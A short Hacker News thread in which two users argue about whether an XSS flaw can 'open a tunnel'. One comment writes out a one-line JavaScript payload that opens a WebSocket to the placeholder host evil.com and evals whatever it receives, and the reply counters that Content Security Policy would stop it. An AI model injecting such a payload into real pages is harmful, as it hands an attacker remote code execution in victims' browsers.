logoalt Hacker News

llmslave2last Friday at 2:37 AM1 replyview on HN

> Show me where you can "open a tunnel" using the XSS in this post.

   new WebSocket("ws://evil.com").addEventListener("message", e => eval(e.data))
> You seem to have multiple fundamental misunderstandings about web application security

Lol yeah sure buddy

Replies

rainonmoonlast Friday at 4:08 AM

Go to Discord and paste that into your console. None of us will hold it against you if you come back and delete these comments once you learn about Content Security Policy.

show 2 replies